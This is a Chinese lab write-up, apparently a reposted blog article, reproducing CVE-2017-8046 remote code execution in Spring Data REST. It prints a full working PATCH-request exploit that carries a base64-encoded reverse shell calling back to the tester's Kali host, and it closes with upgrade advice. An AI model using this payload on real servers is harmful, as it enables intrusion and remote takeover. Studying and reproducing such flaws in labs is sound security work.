漏洞复现 | CVE-2017-8046 Spring Data Rest 远程命令执行

  • A+
所属分类:安全漏洞


0x00 前言

Spring-data-rest服务器在处理PATCH请求时,攻击者可以构造恶意的PATCH请求并发送给spring-date-rest服务器,通过构造好的JSON数据来执行任意Java代码


影响范围:

Spring Data REST versions < 2.5.12, 2.6.7, 3.0 RC3

Spring Boot version < 2.0.0M4

Spring Data release trains < Kay-RC3

0x01 环境

    vulfocus漏洞环境

    kali:192.168.111.128

0x02 复现过程

1、访问,构造对象:

漏洞复现 | CVE-2017-8046 Spring Data Rest 远程命令执行

查看profile:

漏洞复现 | CVE-2017-8046 Spring Data Rest 远程命令执行

查看profile/persons:

漏洞复现 | CVE-2017-8046 Spring Data Rest 远程命令执行

根据参数构造对象:

漏洞复现 | CVE-2017-8046 Spring Data Rest 远程命令执行

{"firstName":"w","lastName":"q"}

2、构造payload

(1) 将反弹shell的payload编码为Java格式:

在线编码网站:http://www.jackson-t.ca/runtime-exec-payloads.html

漏洞复现 | CVE-2017-8046 Spring Data Rest 远程命令执行

bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4LjExMS4xMjgvNDQ0NCAwPiYx}|{base64,-d}|{bash,-i}


(2) 转换成十进制编码:

转十进制:https://www.osgeo.cn/app/s2650

new byte[]{98,97,115,104,32,45,99,32,123,101,99,104,111,44,89,109,70,122,97,67,65,116,97,83,65,43,74,105,65,118,90,71,86,50,76,51,82,106,99,67,56,120,79,84,73,117,77,84,89,52,76,106,69,120,77,83,52,120,77,106,103,118,78,68,81,48,78,67,65,119,80,105,89,120,125,124,123,98,97,115,101,54,52,44,45,100,125,124,123,98,97,115,104,44,45,105,125}
(3) 构造数据包:

访问:http://your-ip:17183/customers/1

PATCH /persons/1 HTTP/1.1Host: 192.168.111.134:17183Accept-Encoding: gzip, deflateAccept: */*Accept-Language: enUser-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)Connection: closeContent-Type: application/json-patch+jsonContent-Length: 202
[{ "op": "replace", "path": "T(java.lang.Runtime).getRuntime().exec(new java.lang.String(new byte[]{98,97,115,104,32,45,99,32,123,101,99,104,111,44,89,109,70,122,97,67,65,116,97,83,65,43,74,105,65,118,90,71,86,50,76,51,82,106,99,67,56,120,79,84,73,117,77,84,89,52,76,106,69,120,77,83,52,120,77,106,103,118,78,68,81,48,78,67,65,119,80,105,89,120,125,124,123,98,97,115,101,54,52,44,45,100,125,124,123,98,97,115,104,44,45,105,125}))/lastName", "value": "vulhub" }]

(4) kali开启监听

漏洞复现 | CVE-2017-8046 Spring Data Rest 远程命令执行

(5) 发送payload,反弹shell

漏洞复现 | CVE-2017-8046 Spring Data Rest 远程命令执行

漏洞复现 | CVE-2017-8046 Spring Data Rest 远程命令执行

0x03 修复建议

    官方已经发布新版本修复了该漏洞,受影响的用户可升级至最新版本来防护该漏洞



☆ END ☆


漏洞复现 | CVE-2017-8046 Spring Data Rest 远程命令执行

本文始发于微信公众号(灼剑安全团队):漏洞复现 | CVE-2017-8046 Spring Data Rest 远程命令执行

发表评论

:?: :razz: :sad: :evil: :!: :smile: :oops: :grin: :eek: :shock: :???: :cool: :lol: :mad: :twisted: :roll: :wink: :idea: :arrow: :neutral: :cry: :mrgreen: